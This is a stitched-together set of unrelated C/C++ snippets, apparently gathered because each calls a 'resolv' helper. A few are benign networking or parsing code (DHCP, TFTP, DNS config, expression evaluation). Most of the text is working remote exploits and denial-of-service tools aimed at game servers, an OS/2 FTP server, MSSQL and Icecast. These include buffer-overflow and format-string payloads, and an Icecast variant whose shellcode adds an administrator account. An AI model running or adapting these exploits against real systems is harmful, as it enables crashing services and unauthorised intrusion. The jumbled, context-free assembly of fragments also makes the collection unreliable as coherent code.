int eval_expr(char *str) { int i; char **tabstring; t_list *op; t_list *nb; op = 0; nb = 0; i = 0; tabstring = str_to_tab_string(str); show_tab_string(tabstring); my_putstr("\n"); while (tabstring[i] != 0) { if (is_operator(tabstring[i]) == 3)//si '(' on empile le retour de pqrenthesis mode my_put_in_list(&nb, parenthesis_mode(&i, tabstring)); if (is_operator(tabstring[i]) == 0)// si nombre on empile my_put_in_list(&nb, tabstring[i]); if (is_operator(tabstring[i]) == 1)//si operateur de basse priorite on empile my_put_in_list(&op, tabstring[i]); if (is_operator(tabstring[i]) == 2)// si operqteur de priorite on resolv resolv(&i, tabstring, &op, &nb); i = i + 1; } return (depile_all(op, nb)); }
char *eval_expr(char *base, char *operators, char *expr, int size) { char **tabexpr; t_list *op; t_list *nb; int i; tabexpr = str_to_tab_string(base, expr, operators); op = 0; nb = 0; i = 0; while (tabexpr[i] != 0) { if (is_open_parent(operators, tabexpr[i]) == 1) my_put_in_list(&nb, parenthesis_mode(base, operators, &i, tabexpr)); if (is_num(base, operators, tabexpr[i]) == 1) my_put_in_list(&nb, tabexpr[i]); if (is_low_op(operators, tabexpr[i]) == 1) my_put_in_list(&op, tabexpr[i]); if (is_high_op(operators, tabexpr[i]) == 1) resolv(base, operators, &i, tabexpr, &op, &nb); i = i + 1; } return (depile_all(base, operators, op, nb)); }
int eval_expr(char *str) { int i; char **tabstring; t_list *op; t_list *nb; op = 0; nb = 0; i = 0; tabstring = str_to_tab_string(str); while (tabstring[i] != 0) { if (is_operator(tabstring[i]) == 3) my_put_in_list(&nb, parenthesis_mode(&i, tabstring)); if (is_operator(tabstring[i]) == 0) my_put_in_list(&nb, tabstring[i]); if (is_operator(tabstring[i]) == 1) my_put_in_list(&op, tabstring[i]); if (is_operator(tabstring[i]) == 2) resolv(&i, tabstring, &op, &nb); i = i + 1; } return (depile_all(op, nb)); }
testifhostisalive(char *host, int port) { struct sockaddr_in addr; int s; char c; s = socket (AF_INET, SOCK_STREAM, 0); addr.sin_family = AF_INET; addr.sin_addr = resolv (host); addr.sin_port = htons (port); if(connect (s, (struct sockaddr *) &addr, sizeof (addr))==0) { printf("System on the other side is patched ===> Good\n"); return; } else { printf("System on the other side is NOT patched ===> Bad\n"); printf("Fix:\n"); printf(" In case you are using a version prior to 4.3, please contact IBM support for"); printf(" further assistance.\n"); printf("If you are using v4.3, you can get the patch at the following URL:\n"); printf("ftp://ftp.software.ibm.com/ps/products/tcpip/fixes/v4.3os2/ic27721/\n"); printf("Vendor URL: http://www.ibm.com\n"); printf("Product URL: http://www.ibm.com/software/os/warp/\n"); } return; }
bool ValidateDnsServer(ServerConfig* conf, const char*, const char*, ValueItem &data) { if (!*(data.GetString())) { std::string nameserver; // attempt to look up their nameserver from /etc/resolv.conf conf->GetInstance()->Log(DEFAULT,"WARNING: <dns:server> not defined, attempting to find working server in /etc/resolv.conf..."); ifstream resolv("/etc/resolv.conf"); bool found_server = false; if (resolv.is_open()) { while (resolv >> nameserver) { if ((nameserver == "nameserver") && (!found_server)) { resolv >> nameserver; data.Set(nameserver.c_str()); found_server = true; conf->GetInstance()->Log(DEFAULT,"<dns:server> set to '%s' as first resolver in /etc/resolv.conf.",nameserver.c_str()); } } if (!found_server) { conf->GetInstance()->Log(DEFAULT,"/etc/resolv.conf contains no viable nameserver entries! Defaulting to nameserver '127.0.0.1'!"); data.Set("127.0.0.1"); } }
bool chat_client_connect() { getplayername(); if (!ircThreadInstance) { ircThreadInstance = new irc_thread__parm(); } int temporarySocket = tcpsocket(); struct sockaddr_in addr; memset(&addr, 0, sizeof(addr)); int ip = resolv(Form1->getChatHost().c_str()); addr.sin_addr.s_addr = ip; addr.sin_port = htons(Form1->getChatPort()); addr.sin_family = AF_INET; int connectRes = connect(temporarySocket, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)); if( connectRes >= 0 && temporarySocket) { ircThreadInstance->sd = temporarySocket; CreateThread(0, 0, irc_ThreadProc, ircThreadInstance, 0, 0); if (!rReconnectWatchThread_started) { rReconnectWatchThread_started = 1; CreateThread(0, 0, irc_ThreadProc_ReconnectWatchThread, 0, 0, 0); } return true; } else { closesocket(temporarySocket); } return false; }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd; u_short port = PORT; u_char *buff; setbuf(stdout, NULL); fputs("\n" "Pigeon server <= 3.02.0143 freeze "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 2) { printf("\nUsage: %s <server> [port(%d)]\n" "\n", argv[0], PORT); exit(1); } #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("\n- target %s:%hu\n", inet_ntoa(peer.sin_addr), port); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); buff = malloc(BUFFSZ); if(!buff) std_err(); memset(buff, 'a', BUFFSZ); buff[BUFFSZ - 5] = '|'; buff[BUFFSZ - 4] = '|'; buff[BUFFSZ - 3] = '1'; buff[BUFFSZ - 2] = '|'; buff[BUFFSZ - 1] = '|'; fputs("- send malformed data\n", stdout); if(send(sd, buff, BUFFSZ, 0) < 0) std_err(); close(sd); fputs("- the server should be freezed, check it manually\n\n", stdout); return(0); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd; u_short port = PORT; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif setbuf(stdout, NULL); fputs("\n" "Chris Moneymaker's World Poker Championship 1.0 buffer-overflow "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <host> [port(%d)]\n" "\n", argv[0], port); exit(1); } if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); fputs("- check server: ", stdout); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); if(timeout(sd) < 0) { fputs("\nError: server doesn't seem to work, I have received no data\n\n", stdout); exit(1); } fputs("ok\n", stdout); fputs("- send malformed data size\n", stdout); send_chmpoker(sd, BOF, sizeof(BOF) - 1, 8, 3); sleep(ONESEC); close(sd); fputs("- the server should be crashed, check it manually\n", stdout); return(0); }
static int tftp_probe(struct device_d *dev) { struct fs_device_d *fsdev = dev_to_fs_device(dev); struct tftp_priv *priv = xzalloc(sizeof(struct tftp_priv)); dev->priv = priv; priv->server = resolv(fsdev->backingstore); return 0; }
void FreeWebChatPoC( char *host, int port ){ struct sockaddr_in peer; int sd, err; peer.sin_addr.s_addr = resolv(host); peer.sin_port = htons(port); peer.sin_family = AF_INET; char *buff = (char *)malloc(513); fprintf( stdout, "\nConnecting to: %s:%hu\n\n", inet_ntoa(peer.sin_addr), port ); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0){ perror("Error"); exit(-1); } err = connect(sd, (struct sockaddr *)&peer, sizeof(peer)); if(err < 0){ perror("Error"); exit(-1); } err = recv(sd, buff, 512, 0); if(err < 0){ perror("Error"); exit(-1); } #ifdef WIN32 closesocket(sd); #else close(sd); #endif free(buff); fprintf( stdout, "\nFree_Web_Chat - DoS - Proof_Of_Concept terminated.\n\n" ); }
int fstat(int fd, struct stat *buf) { int r; static int (*ofstat) (int, struct stat *)= 0; D; resolv((void **)&ofstat, "fstat" SUF); nested++; r = ofstat(fd, buf); if (!r && nested == 1) fdemit('q', fd); nested--; DD; return r; }
int stat(const char *p, struct stat *buf) { int r; static int (*ostat) (const char *restrict, struct stat *restrict)= 0; DP; resolv((void **)&ostat, "stat" SUF); nested++; r = ostat(p, buf); if (!r && nested == 1) emit('q', p); nested--; DD; return r; }
static int do_host(int argc, char *argv[]) { IPaddr_t ip; if (argc != 2) return COMMAND_ERROR_USAGE; ip = resolv(argv[1]); if (!ip) printf("unknown host %s\n", argv[1]); else { printf("%s is at ", argv[1]); print_IPaddr(ip); printf("\n"); } return 0; }
main (int argc, char *argv[]) { struct sockaddr_in addr; int i, s; char c; int port = 21; printf("Systems Affected:\n - OS/2 Warp 4.5 FTP server V4.0/4.2 - OS/2 Warp 4.5 FTP server V4.3 - Probably other versions of the software as well.\n"); printf ("\n"); if (argc < 2) { printf ("Usage : %s <host> [port]\n", argv[0]); exit (0); } if (argc == 3) port = atoi (argv[2]); s = socket (AF_INET, SOCK_STREAM, 0); addr.sin_family = AF_INET; addr.sin_addr = resolv (argv[1]); addr.sin_port = htons (port); connect (s, (struct sockaddr *) &addr, sizeof (addr)); write (s, "USER ", 5); for (i = 1; i <= 1000; i++) { write (s, "a", 1); } write (s, "\n", 1); write (s, "PASS ", 5); for (i = 1; i <= 100; i++) { write (s, "a", 1); } write (s, "\n", 1); read (s, &c, 1); printf("Done sending malicious connection...\n"); printf("Testing if host was patched or not...\n"); testifhostisalive(argv[1],port); }
string LookUp::lookup(const string& ip) { //search in chache first ... if(HostRec *hr = ip_cache_lookup(ip)) return hr->hostname; if(ip_failed_lookup(ip)) return string(); //... nothing there, do lookup and add it to the cache HostRec hr; hr.ip = ip; hr.hostname = resolv(ip); if(hr.hostname.empty()) failed.push_back(hr.ip); else hc.push_back(hr); return hr.hostname; }
static void dhcp_options_process(unsigned char *popt, struct bootp *bp) { unsigned char *end = popt + sizeof(*bp) + OPT_SIZE; int oplen; unsigned char option; int i; while (popt < end && *popt != 0xff) { oplen = *(popt + 1); option = *popt; i = dhcp_options_handle(option, popt + 2, oplen, bp); if (i == ARRAY_SIZE(dhcp_options)) debug("*** Unhandled DHCP Option in OFFER/ACK: %d\n", option); popt += oplen + 2; /* Process next option */ } if (dhcp_tftpname[0] != 0) net_set_serverip(resolv(dhcp_tftpname)); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd, len, attack; u_short port = PORT; u_char numplayers[12], password[256], version[16], pversion[16], username[17], *connmsg = "ComsConnectMessage", *uid, *buff, *pck, *msg, *p, *l; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif setbuf(stdout, NULL); fputs("\n" "Scorched 3D <= 39.1 (bf) multiple vulnerabilities "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 3) { printf("\n" "Usage: %s <attack> <host> [port(%hu)]\n" "\n" "Attacks:\n" "1 = format string and buffer-overflow in addLine and SendString*\n" " (this PoC tests only the format string for simplicity\n" "2 = server freeze through negative numplayers\n" " if server is protected with password you need to know the keyword\n" "3 = ComsMessageHandler buffer-overflow\n" "4 = various crashes and possible code execution in Logger.cpp\n" " if server is protected with password you need to know the keyword\n" "\n", argv[0], port); exit(1); } attack = atoi(argv[1]); if(argc > 3) port = atoi(argv[3]); peer.sin_addr.s_addr = resolv(argv[2]); peer.sin_port = htons(port + 1); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); buff = malloc(BUFFSZ + 1); pck = malloc(BUFFSZ + 1); if(!buff || !pck) std_err(); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer)); if(!timeout(sd)) { len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); if(len < 0) std_err(); buff[len] = 0; scorched3d_info(buff, version, pversion); printf("- set version %s (%s)\n", version, pversion); } else { strcpy(version, "39.1"); strcpy(pversion, "bf"); } close(sd); fputs( "- if you lost the connection probably the server is vulnerable\n" "- start attack:\n", stdout); uid = ""; strcpy(numplayers, "1"); password[0] = 0; switch(attack) { case 1: connmsg = "%n%n%n%n%n"; break; case 2: strcpy(numplayers, "-1"); break; case 3: connmsg = do_it_big(BOFSZ); break; case 4: uid = do_it_big(BOOMSZ); break; default: { printf("\nError: the attack %d is not available\n\n", attack); exit(1); } break; } peer.sin_port = htons(port); for(;;) { // password handling sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); sprintf(username, "%lx", time(NULL)); len = scorched3d_build_pck(pck, connmsg, "host", "Linux", "numplayers", numplayers, "password", password, "pversion", pversion, "uid", uid, "username", username, "version", version, NULL); scorched3d_send(sd, pck, len, buff, BUFFSZ); if(timeout(sd) < 0) { fputs("\nError: socket timeout, the server has not replied to our request\n", stdout); exit(1); } len = scorched3d_recv(sd, pck, BUFFSZ, buff, BUFFSZ); if(!strcmp(buff, "ComsTextMessage")) { msg = buff + 16; if(strstr(msg, "password")) { fputs("- server protected, insert the right password:\n ", stdout); fflush(stdin); fgets(password, sizeof(password), stdin); for(p = password; *p > '\r'; p++); *p = 0; close(sd); continue; } else if(strstr(msg, "version")) { p = strstr(msg, VERTAG); if(!p) { printf("\nError: no version found in the message:\n%s\n", msg); exit(1); } p += sizeof(VERTAG) - 1; l = strchr(p, '('); if(l) *(l - 1) = 0; strcpy(version, p); p = l + 1; l = strchr(p, ')'); if(l) *l = 0; strcpy(pversion, p); printf("- set version %s (%s)\n", version, pversion); close(sd); continue; } printf("%s\n", buff + 16); exit(1); } close(sd); break; } return(0); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd; u_short port = PORT; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif setbuf(stdout, NULL); fputs("\n" "Netpanzer <= 0.8 endless loop "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <host> [port(%d)]\n" "\n", argv[0], port); exit(1); } if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); fputs("- check server: ", stdout); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); if(timeout(sd) < 0) { fputs("\nError: server doesn't seem to work, I have received no data\n\n", stdout); exit(1); } else { fputs("ok\n", stdout); } fputs("- send malformed data size\n", stdout); if(send(sd, "\x00\x00", 2, 0) <= 0) std_err(); close(sd); fputs("- check server status:\n", stdout); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); if(timeout(sd) < 0) { fputs("\nServer IS vulnerable!!!\n\n", stdout); } else { fputs("\nServer doesn't seem vulnerable\n\n", stdout); } close(sd); return(0); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd, len; u_short port = PORT; u_char buff[BUFFSZ], info[] = "\x7f" "\x01\x00" "\x00\x07", pck[] = "\x7f" "\x00\x00" "\x00\x00" "\x00", *p; setbuf(stdout, NULL); fputs("\n" "Scrapland <= 1.0 server termination "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 3) { printf("\n" "Usage: %s <attack> <host> [port(%d)]\n" "\n" "Attack:\n" " 1 = big text string (size>SSize)\n" " 2 = unexistent models (you can test this bug also modifying scrap.cfg)\n" " 3 = newpos<=size\n" " 4 = partial packet after small packet (1 or 2 bytes)\n" "\n", argv[0], port); exit(1); } #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif if(argc > 3) port = atoi(argv[3]); peer.sin_addr.s_addr = resolv(argv[2]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); fputs("- request informations\n", stdout); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); SEND(info, sizeof(info) - 1); RECV; printf("\n Server name %s\n", buff + 10); printf(" Players %d / %d\n\n", *(u_short *)(buff + 8), *(u_short *)(buff + 6)); if(*(u_short *)(buff + 8) == *(u_short *)(buff + 6)) { fputs("- Alert: the server is full so this attack will fail\n\n", stdout); } fputs("- send BOOM packet\n", stdout); switch(atoi(argv[1])) { case 1: { pck[5] = 0xff; // major than 0x7f *(u_short *)(pck + 1) = sizeof(pck) - 4; SEND(pck, sizeof(pck) - 1); } break; case 2: { p = buff; *p++ = 0x7f; p += 2; // data size ADDSHORT(0); // don't know, pck related? ADDTEXT("Unnamed Player"); // PlayerName ADDTEXT("unexistent"); // PlayerModel ADDSHORT(65); // PlayerMaxLife ADDTEXT("unexistent"); // PilotModel ADDTEXT("unexistent"); // Motor0Model ADDTEXT("unexistent"); // Motor1Model ADDTEXT("unexistent"); // Motor2Model ADDTEXT("unexistent"); // Motor3Model ADDTEXT("1,3,0,0,1,0,1"); // WeaponBayList ADDLONG(0); // PlayerTeamID *(u_short *)(buff + 1) = (p - buff) - 3; SEND(buff, p - buff); } break; case 3: { *(u_short *)(pck + 1) = 1; // major than 0 SEND(pck, 5); } break; case 4: { SEND(pck, 1); sleep(ONESEC); *(u_short *)(pck + 1) = 0; SEND(pck, 3); } break; default: { fputs("\nError: wrong attack selected\n\n", stdout); exit(1); } } fputs("- check server:\n", stdout); SEND(info, sizeof(info) - 1); if(timeout(sd) < 0) { fputs("\nServer IS vulnerable!!!\n\n", stdout); } else { fputs("\nServer doesn't seem vulnerable\n\n", stdout); } close(sd); return(0); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd, len; u_short port = PORT; u_char *buff, query[] = "\xfe\xfd\x00\x00\x00\x00\x00\xff\x00\x00"; setbuf(stdout, NULL); fputs("\n" "Breed <= patch #1 zero-length crash "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <host> [port(%d)]\n" "\n", argv[0], port); exit(1); } #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); buff = malloc(BUFFSZ + 1); if(!buff) std_err(); fputs("- request informations:\n", stdout); *(u_long *)(query + 3) = time(NULL) ^ 0x12345678; SEND(query); RECV; show_info(buff, len); fputs("- send zero-length packet\n", stdout); SEND(""); sleep(ONESEC); fputs("- check server:\n", stdout); *(u_long *)(query + 3) = time(NULL) ^ 0x87654321; SEND(query); if(timeout(sd) < 0) { fputs("\nServer IS vulnerable!!!\n\n", stdout); } else { fputs("\nServer doesn't seem vulnerable\n\n", stdout); } close(sd); return(0); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd; u_short port = PORT; u_char buff[BUFFSZ]; setbuf(stdout, NULL); fputs("\n" "Icecast <= 2.0.1 Win32 remote code execution "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "*************************************\n" "SHELLCODE ADDED BY LORDKAOZ\n" "OF #IMPERATORI\n" "*************************************\n" "SHELLCODE BASED ON WIN32_ADDUSER\n" "BY METASPLOIT GROUP\n" "*************************************\n" "\n", stdout); if(argc < 2) { printf("\nUsage: %s <server> [port(%d)]\n" "\n" "THiS iS A POC EXPLOIT BY Luigi Auriemma\n" "AND MODDED BY LORDKAOZ WITH AN ADMINISTRATOR X/X ADDUSER\n" "BASED ON METASPLOIT SHELLCODE\n" "\n", argv[0], PORT); exit(1); } #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("\n- target %s:%hu\n", inet_ntoa(peer.sin_addr), port); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); fputs("- send malformed data\n", stdout); if(send(sd, EXEC, sizeof(EXEC) - 1, 0) < 0) std_err(); if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) { fputs("\nThe Server Is Vulnerable!!!\n\n", stdout); } else { fputs("\nServer Doesn't Seem To Be Vulnerable\n\n", stdout); } close(sd); return(0); }
if (argc!=3) { printf(" MSSQL denial of service\n"); printf(" by securma massine\n"); printf("Cet outil a ete cree pour test ,je ne suis en aucun cas responsable des degats que vous pouvez en faire\n"); printf("Syntaxe: MSSQLdos <ip> <port>\n"); exit(1); } WSAStartup(0x101,&WinsockData); s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); ZeroMemory(&vulh,sizeof(vulh)); vulh.sin_family=AF_INET; vulh.sin_addr.s_addr=resolv(argv[1]); vulh.sin_port=htons(atoi(argv[2])); if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) { printf("Impossible de se connecter...le port est en generale 1433...\n"); exit(1); } { send(s,buffer,sizeof(buffer),0); printf("Data envoyes...\n"); } printf("\nattendez quelques secondes et verifiez que le serveur ne repond plus.\n"); closesocket(s); WSACleanup();
static int do_dhcp(int argc, char *argv[]) { int ret, opt; int retries = DHCP_DEFAULT_RETRY; dhcp_reset_env(); getenv_uint("global.dhcp.retries", &retries); while((opt = getopt(argc, argv, "H:v:c:u:U:r:")) > 0) { switch(opt) { case 'H': dhcp_set_param_data(DHCP_HOSTNAME, optarg); break; case 'v': dhcp_set_param_data(DHCP_VENDOR_ID, optarg); break; case 'c': dhcp_set_param_data(DHCP_CLIENT_ID, optarg); break; case 'u': dhcp_set_param_data(DHCP_CLIENT_UUID, optarg); break; case 'U': dhcp_set_param_data(DHCP_USER_CLASS, optarg); break; case 'r': retries = simple_strtoul(optarg, NULL, 10); break; } } if (!retries) { printf("retries is set to zero, set it to %d\n", DHCP_DEFAULT_RETRY); retries = DHCP_DEFAULT_RETRY; } dhcp_con = net_udp_new(0xffffffff, PORT_BOOTPS, dhcp_handler, NULL); if (IS_ERR(dhcp_con)) { ret = PTR_ERR(dhcp_con); goto out; } ret = net_udp_bind(dhcp_con, PORT_BOOTPC); if (ret) goto out1; net_set_ip(0); dhcp_start = get_time_ns(); ret = bootp_request(); /* Basically same as BOOTP */ if (ret) goto out1; while (dhcp_state != BOUND) { if (ctrlc()) { ret = -EINTR; goto out1; } if (!retries) { ret = -ETIMEDOUT; goto out1; } net_poll(); if (is_timeout(dhcp_start, 3 * SECOND)) { dhcp_start = get_time_ns(); printf("T "); ret = bootp_request(); /* no need to check if retries > 0 as we check if != 0 */ retries--; if (ret) goto out1; } } if (dhcp_tftpname[0] != 0) { IPaddr_t tftpserver = resolv(dhcp_tftpname); if (tftpserver) net_set_serverip(tftpserver); } out1: net_unregister(dhcp_con); out: if (ret) printf("dhcp failed: %s\n", strerror(-ret)); return ret; }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd, len; u_short port = PORT; u_char buff[BUFFSZ], *p; setbuf(stdout, NULL); fputs("\n" "Lords of the Realm III <= 1.01 server crash "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <server> [port(%d)]\n" "\n", argv[0], PORT); exit(1); } #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); printf("- target %s:%hu\n", inet_ntoa(peer.sin_addr), port); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); if(recv(sd, buff, BUFFSZ, 0) < 0) std_err(); fputs("- informations:\n", stdout); if(*buff != 11) { p = buff + 5; SHOW(" Server*Admin: "); p += 2; SHOW(" Map: "); } else { p = buff + 24; SHOW(" Admin nick: "); } *(u_long *)buff = BUFFSZ - 4; memcpy(buff + 4, "\x79\xff\xff\xff\xff", 5); *(u_long *)(buff + 9) = (BUFFSZ - 14) >> 1; memset(buff + 13, 'a', BUFFSZ - 14); buff[BUFFSZ - 1] = 0x45; fputs("\n- send BOOM data\n", stdout); if(send(sd, buff, BUFFSZ, 0) < 0) std_err(); if(recv(sd, buff, BUFFSZ, 0) < 0) { fputs("\nServer IS vulnerable!!!\n\n", stdout); } else { fputs("\nServer doesn't seem to be vulnerable\n\n", stdout); } close(sd); return(0); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd, len, attack, tmp, autoport = 1; u_short port = PORT; u_char *buff, info[] = "Y_NET_YAGER_CLIENT\0" "\x00\x00" "\x00\x00", *p; struct yager_head { u_long type; u_short size; u_short pck1; u_short pck2; } *yh; setbuf(stdout, NULL); fputs("\n" "Yager <= 5.24 multiple vulnerabilities "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 3) { printf("\n" "Usage: %s <attack> <host> [port(auto)]\n" "\n" "Attacks:\n" " 1 = nickname buffer-overflow\n" " 2 = big data buffer-overflow\n" " 3 = freeze of server and connected clients\n" " 4 = crash using type 0x1d (in 0x0050e970)\n" " 5 = crash using type 0x22 (in 0x004fd2b8)\n" " 6 = crash using type 0x24 (in 0x004fd2f5)\n" " 7 = crash using type 0x28 (in 0x004b0f1b)\n" "\n", argv[0]); exit(1); } #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif if(argc > 3) { autoport = 0; port = atoi(argv[3]); } peer.sin_addr.s_addr = resolv(argv[2]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); buff = malloc(BUFFSZ); if(!buff) std_err(); if(autoport) { sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); fputs("- request informations:\n", stdout); *(u_short *)(info + 19) = ~time(NULL); SENDTO(info); RECVFROM; close(sd); p = buff + 19; port = ntohs(*(u_short *)p); printf("\n Server port %d\n", port); p += 2; SHOW(" Map "); printf(" Version %d.%d\n", p[1], p[0]); p += 2; SHOW(" Server name "); p += 4; printf(" Players %d / %d\n\n", p[1], p[0]); peer.sin_port = htons(port); } attack = atoi(argv[1]); if(attack > 7) { fputs("\nError: you have chosen a wrong attack number\n\n", stdout); exit(1); } sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); yh = (struct yager_head *)buff; yh->pck1 = tmp = ~time(NULL) & 0xffff; yh->pck2 = 0; if(attack == 1) { yh->type = 0x1e; memcpy(buff + HEADSZ, NICKBOF, sizeof(NICKBOF) - 1); yh->size = sizeof(NICKBOF) - 1; fputs("- send long data block for nickname buffer-overflow\n", stdout); } else if(attack == 2) { yh->type = 0x00; // almost any other type is ok memcpy(buff + HEADSZ, PCKBOF, sizeof(PCKBOF) - 1); yh->size = sizeof(PCKBOF) - 1; fputs("- send long data block for packet buffer-overflow\n", stdout); } else if(attack == 3) { yh->type = 0x1b; yh->size = 0; printf("- server waits for %d bytes but we send a partial header\n", HEADSZ); tmp %= HEADSZ; if(tmp <= 0) tmp = 1; SEND(buff, tmp); fputs(" Server and connected clients should be freezed, press RETURN to stop the attack\n", stdout); fgetc(stdin); close(sd); return(0); } else { if(attack == 4) { yh->type = 0x1d; } else if(attack == 5) { yh->type = 0x22; } else if(attack == 6) { yh->type = 0x24; } else if(attack == 7) { yh->type = 0x28; } memset(buff + HEADSZ, 0xff, CRASHSZ); yh->size = CRASHSZ; printf("- send crash data with type 0x%08lx\n", yh->type); } SEND(buff, yh->size + HEADSZ); fputs("- check server status\n", stdout); if(!timeout(sd)) { if(recv(sd, buff, BUFFSZ, 0) < 0) { fputs("\nServer IS vulnerable!!!\n\n", stdout); } else { fputs("\nServer doesn't seem vulnerable\n\n", stdout); } } else { fputs("\nNo reply from the server, it is probably not vulnerable\n\n", stdout); } close(sd); return(0); }
